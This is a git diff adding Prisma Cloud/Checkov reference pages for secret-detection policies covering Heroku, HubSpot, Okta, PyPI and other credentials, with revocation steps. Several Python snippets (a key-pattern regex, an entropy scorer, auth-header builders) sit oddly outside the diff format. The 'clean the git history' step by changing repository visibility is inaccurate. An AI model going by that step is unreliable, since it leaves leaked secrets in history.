+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-48.adoc
@@ -0,0 +1,53 @@
+== Heroku Platform Key
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| ab6c1821-7b25-43d6-9ff0-ba300479c1ac
+
+|Checkov Check ID
+|CKV_SECRET_48
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+Heroku is a cloud platform as a service (PaaS) supporting several programming languages.
+The Heroku network runs the customer's apps in virtual containers, which execute on a reliable runtime environment.
+Heroku calls these containers "Dynos".
+These Dynos can run code written in Node, Ruby, PHP, Go, Scala, Python, Java, or Clojure.
+Heroku also provides custom buildpacks with which the developer can deploy apps in any other language.
Heroku lets the developer scale the app instantly just by increasing the number of dynos or by changing the type of dyno the app runs in.
+
+=== Fix - Buildtime
+
+
+*Heroku*
+
+
+
+. Revoke the key.
+
+. In Heroku, click on Account Settings.
+
+. Click on API Key.
+
+. Find the compromised key and click on Revoke.
+
+. Monitor for abuse.
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-49.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-49.adoc
new file mode 100644
index 000000000..a4472e8d5
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-49.adoc
@@ -0,0 +1,46 @@
+== HubSpot API Key
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| bfdda3a2-e2d2-4bfb-ba7d-49466c108a88
+
+|Checkov Check ID
+|CKV_SECRET_49
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+With the HubSpot API key, developers can create custom applications with HubSpot's APIs.
+Each key is specific to a HubSpot account, not an individual user, and only one key is allowed at a time.
+
+=== Fix - Buildtime
+
+
+*HubSpot*
+
+To rotate your HubSpot API key:
+
+* In your HubSpot account, click the settings icon in the main navigation bar.
+In the left sidebar menu, navigate to Integrations > API key.
+* Click the Actions dropdown menu, then select Rotate key.
+* Click Rotate and expire this key now.
+Select the reCAPTCHA checkbox.
+Your existing key will be deactivated and a new API key will be created.
+* Click Copy and replace the deactivated API key used by your applications with this new API key.
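Because a HubSpot account has only one key at a time, scanners mostly rely on the key's shape. As a hedged sketch (the UUID shape of the legacy `hapikey` is an assumption, and the key below is fabricated), a minimal detector can flag UUID-like values assigned near HubSpot-related names:

```python
import re

# Assumption: legacy HubSpot API keys (the "hapikey") are UUID-shaped.
HAPIKEY_RE = re.compile(
    r"\b[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\b",
    re.IGNORECASE,
)

line = 'hubspot_key = "aaaabbbb-1111-2222-3333-ccccddddeeee"'  # fabricated key
print(bool(HAPIKEY_RE.search(line)))  # True
```

A real policy also checks the surrounding variable name, since UUIDs appear in many non-secret contexts.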
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-5.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-5.adoc
new file mode 100644
index 000000000..0dd0edbf2
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-5.adoc
@@ -0,0 +1,51 @@
+== Cloudant Credentials
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 0a69df21-a2a9-4b25-ae3b-1074d1e5e812
+
+|Checkov Check ID
+|CKV_SECRET_5
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+Cloudant is a document-oriented and distributed database running on IBM Cloud.
+The service can be accessed via API calls.
+An optional authentication method requires a username and password.
+An alternate authentication method consists of a username and the corresponding apikey.
+
+=== Fix - Buildtime
+
+
+*Cloudant*
+
+
+
+. Revoke the exposed secret.
++
+The secret can be revoked from the IBM Cloudant dashboard in the Service credentials tab.
+
+. Clean the git history.
++
+Go under the settings section of your GitHub project and choose the change visibility button at the bottom.
+
+. Inspect LogDNA logs to ensure the key was not utilized during the compromised period.
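A point worth making explicit when triaging leaked Cloudant credentials: username/password pairs travel in an HTTP Basic Authorization header, which is only base64 encoding, not encryption, so anyone who sees the committed value can recover the credentials. A minimal sketch of how that header is built:

```python
import base64

def basic_auth_header(username: str, password: str) -> str:
    """Build an HTTP Basic Authorization header value.

    Base64 is trivially reversible, which is why a leaked header (or the
    credentials it encodes) must be revoked, not treated as hidden.
    """
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    return f"Basic {token}"

print(basic_auth_header("user", "pass"))  # Basic dXNlcjpwYXNz
```

`base64.b64decode("dXNlcjpwYXNz")` returns `b"user:pass"`, demonstrating the round trip.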
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-50.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-50.adoc
new file mode 100644
index 000000000..c1e088630
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-50.adoc
@@ -0,0 +1,47 @@
+== Intercom Access Token
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 1abf6697-5737-4067-8cbc-c060ca8cf331
+
+|Checkov Check ID
+|CKV_SECRET_50
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+The Intercom Access Token allows access to the Intercom API.
+
+The Access Token is recommended for use in the following scenarios:
+
+* When using the API to interact with an Intercom app
+* When creating scripts that push or extract data from the Intercom app
+* When automating certain actions in your Intercom app
+* When programmatically accessing customer data
+
+=== Fix - Buildtime
+
+
+*Intercom*
+
+You can regenerate the Access Token by clicking Regenerate token, or revoke it by uninstalling the app (by clicking Uninstall app).
+
+
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-51.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-51.adoc
new file mode 100644
index 000000000..e297863d6
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-51.adoc
@@ -0,0 +1,46 @@
+== Jira Token
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| afa159db-75a7-451c-9731-9a353c6e6a78
+
+|Checkov Check ID
+|CKV_SECRET_51
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+In Jira, Personal access tokens (PATs) are a secure way to use scripts and integrate external applications with your Atlassian application.
+If an external system is compromised, you simply revoke the token instead of changing the password and consequently changing it in all scripts and integrations.
+Personal access tokens are a safe alternative to using a username and password for authentication with various services.
+
+=== Fix - Buildtime
+
+
+*Jira*
+
+
+
+. In Jira, select your profile picture at the top right of the screen, then choose Personal Access Tokens.
+
+. Select Revoke next to the token you want to delete.
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-52.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-52.adoc
new file mode 100644
index 000000000..0de882fb3
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-52.adoc
@@ -0,0 +1,65 @@
+== LaunchDarkly Personal Token
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 90828b95-50f6-42ed-bc3f-4cc8a80e0250
+
+|Checkov Check ID
+|CKV_SECRET_52
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+In LaunchDarkly, all REST API resources are authenticated with either personal or service access tokens, or session cookies.
+Other authentication mechanisms are not supported.
+You can manage personal access tokens on your Account settings page.
+You can configure a personal access token to have the same permissions that you do, or more restrictive permissions.
+Your personal tokens can never do more than you can in LaunchDarkly.
+Use a personal token when you want to access the LaunchDarkly API for your temporary or personal use.
+
+=== Fix - Buildtime
+
+
+*LaunchDarkly*
+
+
+
+. Navigate to the Account settings page.
+
+. Click into the Authorization tab.
+
+. Find your token in the "Access tokens" section.
+
+. 
Click the overflow menu for the token and select Delete token to delete the access token.
++
+If you delete a token, API calls made with that token return 401 Unauthorized status codes.
++
+You can also use the REST API to delete an access token:
++
+
+[source,text]
+----
+curl -i -X DELETE \
+  'https://app.launchdarkly.com/api/v2/tokens/{id}' \
+  -H 'Authorization: YOUR_API_KEY_HERE'
+----
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-53.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-53.adoc
new file mode 100644
index 000000000..70b6a99db
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-53.adoc
@@ -0,0 +1,46 @@
+== Netlify Token
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 516fde21-67e9-4573-bfe7-41f6c5b8f5c0
+
+|Checkov Check ID
+|CKV_SECRET_53
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+Netlify provides a platform for building, deploying, and scaling websites whose source files are stored in the version control system Git and then generated into static web content files served via a Content Delivery Network.
+The platform also provides services and features of serverless computing and edge computing, offering serverless functions that are version-controlled, built, and deployed alongside frontend code.
+You can generate a personal access token in your Netlify user settings for manual authentication in shell scripts or commands that use the Netlify API.
+If you're making a public integration with Netlify for others to enjoy, you must use OAuth2.
+This allows users to authorize your application to use Netlify on their behalf without having to copy/paste API tokens or touch sensitive login info.
+You'll need an application client key and a client secret to integrate with the Netlify API.
+
+=== Fix - Buildtime
+
+
+*Netlify*
+
+To revoke your user access token for Netlify CLI, go to your Netlify user Applications settings.
+For access granted using the netlify login command, scroll to the Authorized applications section, and find Netlify CLI.
+Select Options > Revoke access.
+If you manually created a personal access token, you can find it in the Personal access tokens section.
+Select Options > Delete personal token.
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-54.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-54.adoc
new file mode 100644
index 000000000..30af32524
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-54.adoc
@@ -0,0 +1,41 @@
+== New Relic Key
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| b2b74119-7057-4412-8b7d-fdf40e3cc916
+
+|Checkov Check ID
+|CKV_SECRET_54
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+New Relic monitoring solutions use API keys to authenticate and verify user identity.
+The primary key is the user key (for working with NerdGraph, our GraphQL API).
+These keys allow only approved people in your organization to report data to New Relic, access that data, and configure features.
+
+=== Fix - Buildtime
+
+
+*New Relic*
+
+You can view and manage most API keys from the API keys UI page, which is at one.newrelic.com/launcher/api-keys-ui.api-keys-launcher (from the account dropdown, click API keys).
+ + diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-55.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-55.adoc new file mode 100644 index 000000000..67c74cd91 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-55.adoc @@ -0,0 +1,49 @@ +== Notion Integration Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8dcf5a77-4822-49f5-ab61-fcd7c748feea + +|Checkov Check ID +|CKV_SECRET_55 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +The Notion API uses bearer tokens to authorize requests from integrations. +As an integration developer, you'll need to choose the appropriate integration type for the integration you create. +Based on the integration type, you'll receive and store bearer tokens differently. +For both types, an integration must send the bearer token in the HTTP Authorization request header. + +=== Fix - Buildtime + + +*Notion* + + + +. Revoke the token + +. In Notion, click on Integrations + +. Click on Developers + +. 
Look for the integration to revoke and click on Revoke.
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-56.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-56.adoc
new file mode 100644
index 000000000..6b09732e6
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-56.adoc
@@ -0,0 +1,48 @@
+== Okta Token
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| ded6eeb0-ff9e-4455-bb8b-b9a5754fb758
+
+|Checkov Check ID
+|CKV_SECRET_56
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+Okta API tokens are used to authenticate requests to the Okta API, just like HTTP cookies authenticate requests to the Okta Application with your browser.
+An API token is issued for a specific user, and all requests with the token act on behalf of that user.
+API tokens are secrets and should be treated like passwords.
+API tokens are generated with the permissions of the user that created the token.
+If a user's permissions change, then so do the token's.
+Super admins, org admins, and group admins may create tokens.
+
+=== Fix - Buildtime
+
+
+*Okta*
+
+To revoke a token, click the trash icon at the right of the token information.
+Note that the icon is not always active:
+
+* Agent tokens are revocable if the agent is not active;
+otherwise, you must deactivate the agent before revoking the token.
+Some agents, such as the Okta AD Agent, automatically revoke their tokens for you when you deactivate the agent.
+* API Tokens are always revocable.
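As context for why a leaked Okta token is directly usable: per Okta's API conventions, the token is presented in an Authorization header with the SSWS scheme, so nothing beyond the raw string is needed. A minimal sketch (the token value is a fabricated placeholder):

```python
def okta_auth_header(api_token: str) -> dict:
    """Headers for an Okta API request; the token rides in the SSWS scheme."""
    return {
        "Accept": "application/json",
        "Content-Type": "application/json",
        "Authorization": f"SSWS {api_token}",
    }

headers = okta_auth_header("00abc-placeholder-token")  # fabricated value
print(headers["Authorization"])  # SSWS 00abc-placeholder-token
```

Anyone holding the committed token can construct this header, which is why revocation, not rotation of the surrounding password, is the fix.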
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-57.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-57.adoc
new file mode 100644
index 000000000..21540ab41
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-57.adoc
@@ -0,0 +1,47 @@
+== PagerDuty Authorization Token
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| e66683fb-cce5-4b61-8a20-03fadc90d390
+
+|Checkov Check ID
+|CKV_SECRET_57
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+The PagerDuty REST API supports authenticating via an account or user API token.
+Account API tokens have access to all of the data on an account, and can either be granted read-only access or full access to read, write, update, and delete.
+For PagerDuty accounts with Advanced Permissions, user API tokens have access to all of the data that the associated user account has access to.
+Only account administrators have the ability to generate account API tokens.
+
+=== Fix - Buildtime
+
+
+*PagerDuty*
+
+
+
+. In the web app, navigate to Integrations > API Access Keys.
+
+. In the table of API access keys, select Remove next to the key you'd like to delete.
+
+. Confirm your selection in the browser alert.
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-58.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-58.adoc new file mode 100644 index 000000000..74e79bec6 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-58.adoc @@ -0,0 +1,52 @@ +== PlanetScale Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| d671864e-5c7b-423b-bfe2-2ede45e8d18a + +|Checkov Check ID +|CKV_SECRET_58 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +PlanetScale offers a managed database platform that is designed for developers and developer workflows. +The PlanetScale CLI allows developers to create development branches, open deploy requests, and make non-blocking schema changes directly from a terminal. +PlanetScale provides the ability to create service tokens for your PlanetScale organization via the CLI or directly in the UI. +Service tokens are not recommended for connecting to production databases. +Instead, connect securely to your database using PlanetScale connection strings. + +=== Fix - Buildtime + + +*PlanetScale* + + + +. Go to the service tokens page for your organization: app.planetscale.com + +. Click on the service token ID for the service token you would like to delete. + +. Click on the "Delete service token" button in the upper right hand corner. + +. Confirm deletion by clicking the "Delete" button in the pop-up modal. + +. Deleting a service token will sever any database connections that use the given service token. 
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-59.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-59.adoc
new file mode 100644
index 000000000..da5a8ed59
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-59.adoc
@@ -0,0 +1,51 @@
+== Postman API Key
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| a183a84f-e1f0-4751-bdaa-b3b799ec3dd4
+
+|Checkov Check ID
+|CKV_SECRET_59
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+The Postman API endpoints enable developers to integrate Postman within the development toolchain.
+Developers can add new collections, update existing collections, update environments, and add and run monitors directly through the API.
+This enables them to programmatically access data stored in a Postman account.
+They can also combine the Postman API with Newman to integrate Postman with a CI/CD workflow.
+
+=== Fix - Buildtime
+
+
+*Postman*
+
+
+
+. Open your Postman API Keys page.
+
+. Select your avatar in the upper-right corner > Settings.
++
+Then select Postman API keys.
+
+. Once you have API keys generated, you can manage them within your workspace.
++
+Select the more actions icon next to a key to regenerate or delete it.
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-6.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-6.adoc
new file mode 100644
index 000000000..1a485b578
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-6.adoc
@@ -0,0 +1,79 @@
+== Base64 High Entropy Strings
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 0723a8d8-1bd2-4ccb-afee-ddc3691ced71
+
+|Checkov Check ID
+|CKV_SECRET_6
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+Entropy checks help detect unstructured secrets by measuring the entropy level of a single string.
+Entropy assigns a numerical score to how unpredictable a string is, that is, the likelihood that it contains highly random data.
+Strings with a high entropy score are flagged as suspected secrets.
+
+=== Fix - Buildtime
+
+
+*Multiple Services*
+
+
+
+. Revoke the exposed secret.
++
+Start by understanding what services were impacted and refer to the corresponding API documentation to learn how to revoke and rotate the secret.
+
+. Clean the git history.
++
+Go under the settings section of your GitHub project and choose the change visibility button at the bottom.
+
+. Check any relevant access logs to ensure the key was not utilized during the compromised period.
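The entropy scoring described above can be sketched in a few lines. This is a minimal illustration, not Prisma Cloud's exact tuning; the 4.5-bit figure mentioned in the comment is the default base64-charset threshold used by the detect-secrets library:

```python
import math

def shannon_entropy(s: str) -> float:
    """Shannon entropy of a string, in bits per character."""
    if not s:
        return 0.0
    n = len(s)
    # Sum -p*log2(p) over the distinct characters of the string.
    return -sum((s.count(c) / n) * math.log2(s.count(c) / n) for c in set(s))

# A base64-looking random string scores far higher than a dictionary-style
# password; scanners flag strings above a tuned threshold (detect-secrets,
# for example, defaults to 4.5 bits for base64-charset strings).
secret_like = "ZWVTjPQSdhwRgl204Hc51YCsritMIzn8B=/p9UyeX7xu6KkAGqfm3FJ+oObLDNEv"
word_like = "examplepassword"
print(shannon_entropy(secret_like) > shannon_entropy(word_like))  # True
```

A string of one repeated character scores 0 bits, and a string whose characters are all distinct approaches the maximum for its alphabet, which is why random keys stand out.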
+
+=== Fix - Terraform
+
+
+[source,hcl]
+----
+resource "aws_glue_connection" "examplevpc" {
+  # PASSWORD removed - pull the secret in dynamically instead of hardcoding it
+  connection_properties = {
+    JDBC_CONNECTION_URL = "jdbc:mysql://${aws_rds_cluster.example.endpoint}/exampledatabase"
+    USERNAME            = "exampleusername"
+  }
+
+  name = "example"
+
+  physical_connection_requirements {
+    availability_zone      = aws_subnet.example.availability_zone
+    security_group_id_list = [aws_security_group.example.id]
+    subnet_id              = aws_subnet.example.id
+  }
+}
+----
+
+Don't hardcode the secret in the resource; pull it in dynamically from a secret source of your choice, e.g. AWS Parameter Store. If the secret is already committed to source, follow the git instructions stated previously.
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-60.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-60.adoc
new file mode 100644
index 000000000..cef000d28
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-60.adoc
@@ -0,0 +1,51 @@
+== Pulumi Access Token
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| b2ec65ce-9bc0-463e-b8e2-92d38423183a
+
+|Checkov Check ID
+|CKV_SECRET_60
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+Pulumi is a modern infrastructure as code platform.
+It leverages existing programming languages--TypeScript, JavaScript, Python, Go, .NET, Java, and markup languages like YAML--and their native ecosystems to interact with cloud resources through the Pulumi SDK.
+A downloadable CLI, runtime, libraries, and a hosted service work together to deliver a robust way of provisioning, updating, and managing cloud infrastructure.
+Organization Access Tokens provide Enterprise and Business Critical customers the opportunity to manage resources and stack operations for their organization independent of a single-user account. + +=== Fix - Buildtime + + +*Pulumi* + + + +. From the organization's homepage, follow the same steps as for a Personal Access Token: + +. Navigate to Settings > Access Tokens. + +. Choose Delete token from the action menu. ++ +You will be prompted in a dialog to confirm your choice. + +. If you choose to delete a token, its access will immediately be revoked and all further operations using it will fail as unauthorized. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-61.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-61.adoc new file mode 100644 index 000000000..10b1dc6d3 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-61.adoc @@ -0,0 +1,46 @@ +== Python Package Index Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| ce61d4a3-bc17-494a-86f1-40d26fa73b1f + +|Checkov Check ID +|CKV_SECRET_61 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +The Python Package Index (PyPI) stores meta-data describing distributions packaged with distutils, as well as package data like distribution files if a package author wishes. +PyPI lets you submit any number of versions of your distribution to the index. +If you alter the meta-data for a particular version, you can submit it again and the index will be updated. 
+A PyPI API token is a string consisting of a prefix (pypi), a separator (-), and a base64-encoded macaroon serialized with PyMacaroon v2.
+
+=== Fix - Buildtime
+
+
+*PyPI*
+
+Some content managers run regexes to try to identify published secrets, and ideally have them deactivated.
+
+PyPI has started integrating with such systems in order to help secure packages.
+
+For more information see https://warehouse.pypa.io/development/token-scanning.html?highlight=secrets#token-scanning[here].
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-62.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-62.adoc
new file mode 100644
index 000000000..39e88f3cd
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-62.adoc
@@ -0,0 +1,56 @@
+== RapidAPI Key
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 1f01777e-9839-47c3-bd90-e840a464b17b
+
+|Checkov Check ID
+|CKV_SECRET_62
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+RapidAPI is used to find, test, and connect to thousands of APIs -- all with a single API key and dashboard.
+It allows finding APIs, embedding them into an app, and tracking usage of all endpoints.
+To connect an API to a project or application, you must have an API key to authenticate your request.
+Creating an app within RapidAPI generates an API key (X-RapidAPI-Key) specific to that application.
+You can view analytics based on the API calls you make using this app key.
+
+=== Fix - Buildtime
+
+
+*RapidAPI*
+
+You can create a new API key and delete the compromised one in a few steps from the Developer Dashboard:
+
+
+. Select the application with the compromised key and navigate to the Security page.
+
+. Click "Add New Key." You can also edit the API Key name if desired.
+
+. Now it is time to test the new API key.
++ +Go to the API's Endpoints tab on the RapidAPI Hub listing and select the new API key from the X-RapidAPI-Key dropdown. ++ +Click the "Test Endpoint" button to ensure the new API key is working properly. + +. Update your project with the new API key. + +. Return to the application's Security page and delete the compromised API key. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-63.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-63.adoc new file mode 100644 index 000000000..dd5173da0 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-63.adoc @@ -0,0 +1,46 @@ +== Readme API Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| be223514-2ba7-4937-80d8-2bc725d201c1 + +|Checkov Check ID +|CKV_SECRET_63 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +ReadMe offers a managed service for maintaining a documentation site. +Each documentation site that you publish on ReadMe is a project. +Within a project there is space for documentation, interactive API reference guides, a changelog, and many more features. +Each project within your account is published separately. 
+
+=== Fix - Buildtime
+
+
+*Readme*
+
+If one of your API keys has been leaked, or if you have any security concerns about a particular API key, we strongly recommend you rotate out your API keys.
+You can do so by taking the following steps:
+
+* Delete the exposed API key in your dashboard (there is a Delete option if you click the three dots on the right-hand side).
+* Re-generate a new API key in its place.
+* Replace any usage of the leaked API key with the new one.
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-64.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-64.adoc
new file mode 100644
index 000000000..185a4a5cb
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-64.adoc
@@ -0,0 +1,49 @@
+== RubyGems API Key
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 2a6b9d00-c551-4f66-865a-9e9950886745
+
+|Checkov Check ID
+|CKV_SECRET_64
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+RubyGems is a package manager for the Ruby programming language that provides a standard format for distributing Ruby programs and libraries, a tool designed to easily manage the installation of gems, and a server for distributing them.
+You can create multiple API keys based on your requirements.
+API keys have varying scopes that grant specific privileges.
+Using API keys with the least amount of privilege makes your RubyGems.org account more secure by limiting the impact a compromised key may have.
+
+=== Fix - Buildtime
+
+
+*RubyGems*
+
+
+
+. Visit your RubyGems.org account settings page and click on API KEYS.
++
+You will be prompted for your account password to confirm your identity.
+
+. Use the Edit button to update the scopes of the key.
+
+. You can use the Reset button in the last row to delete all the API keys associated with your account.
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-65.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-65.adoc
new file mode 100644
index 000000000..d0f913512
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-65.adoc
@@ -0,0 +1,46 @@
+== Sentry Token
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 77cc76d6-34e9-4aea-8168-508e8c9b35bb
+
+|Checkov Check ID
+|CKV_SECRET_65
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+Sentry Authentication tokens are passed using an auth header, and are used to authenticate as a user or organization account with the API.
+In our documentation, we have several placeholders that appear between curly braces or chevrons, such as \{API_KEY}, which you will need to replace with one of your authentication tokens in order to use the API call effectively.
+
+
+=== Fix - Buildtime
+
+
+*Sentry*
+
+
+
+. Go to Settings > Developer Settings > [Your Internal Integration]
+
+. You can have up to 20 tokens at a time for each internal integration.
++
+These tokens do not expire automatically, but you can manually revoke them as needed.
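A hedged sketch of the placeholder substitution the Sentry description mentions: instead of committing the token where a scanner will flag it, read it from the environment at runtime when building the auth header (the variable name `SENTRY_AUTH_TOKEN` is illustrative, not mandated):

```python
import os

def bearer_header_from_env(var_name: str = "SENTRY_AUTH_TOKEN") -> str:
    """Build a Bearer auth header value from an environment variable.

    Raises KeyError if the variable is unset, failing loudly rather than
    sending an empty credential.
    """
    token = os.environ[var_name]
    return f"Bearer {token}"

os.environ["SENTRY_AUTH_TOKEN"] = "example-token"  # demo only; set this outside source control
print(bearer_header_from_env())  # Bearer example-token
```

The same pattern applies to any of the tokens in this policy index: the secret lives in the deployment environment or a secrets manager, and only the lookup appears in committed code.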
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-66.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-66.adoc
new file mode 100644
index 000000000..3783d1834
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-66.adoc
@@ -0,0 +1,47 @@
+== Splunk User Credentials
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
